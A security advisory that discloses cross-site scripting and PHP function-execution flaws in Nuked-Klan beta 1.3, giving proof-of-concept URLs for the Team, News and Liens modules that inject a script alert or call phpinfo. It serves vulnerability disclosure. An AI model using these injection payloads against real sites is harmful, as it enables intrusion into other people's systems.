________________________________________________________________________ Security Corporation Security Advisory [SCSA-006] ________________________________________________________________________ PROGRAM: Nuked-Klan HOMEPAGE: http://www.nuked-klan.org VULNERABLE VERSIONS: beta 1.3 ________________________________________________________________________ DESCRIPTION ________________________________________________________________________ Nuked Klan is a PHP Gateway for "clans". (direct quote from Nuked Klan website) DETAILS & EXPLOITS ________________________________________________________________________ Many Cross-Site Scripting vulnerabilities have been found in Nuked Klan which allow attackers to inject script codes into the page and use them on clients browser as if they were provided by the site. These Cross-Site Scripting vulnerabilities are found in the following modules : Team, News, Links(Liens). An attacker can input specially crafted links and/or other malicious scripts. Moreover this vulnerability allows an attacker to reach certain functions of php. Team ________________________________________________________________________ A vulnerability was discovered at this adress : XSS: ---- http://[target]/index.php?file=Team&op=<script>alert('Test');</script> Function Execution: ------------------- http://[target]/index.php?file=Team&op=phpinfo (display phpinfo(); - Outputs lots of PHP information) News ________________________________________________________________________ A vulnerability was discovered at this adress : XSS: ---- http://[target]/index.php?file=News&op=<script>alert('test');</script> Function Execution: ------------------- http://[target]/index.php?file=News&op=phpinfo (display phpinfo(); - Outputs lots of PHP information) Links ________________________________________________________________________ A vulnerability was discovered at this adress : XSS: ---- http://[target]/index.php?file=Liens&op=<script>alert('test');</script> Function Execution: ------------------- http://[target]/index.php?file=Liens&op=phpinfo (display phpinfo(); - Outputs lots of PHP information) SOLUTIONS ________________________________________________________________________ No solutions for the moment. VENDOR STATUS ________________________________________________________________________ The vendor has reportedly been notified. It currently develops a patch. LINKS ________________________________________________________________________ http://www.security-corp.org/index.php?ink=4-15-1 Version Française : http://www.security-corp.org/advisories/SCSA-006-FR.txt ------------------------------------------------------------ Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org ------------------------------------------------------------
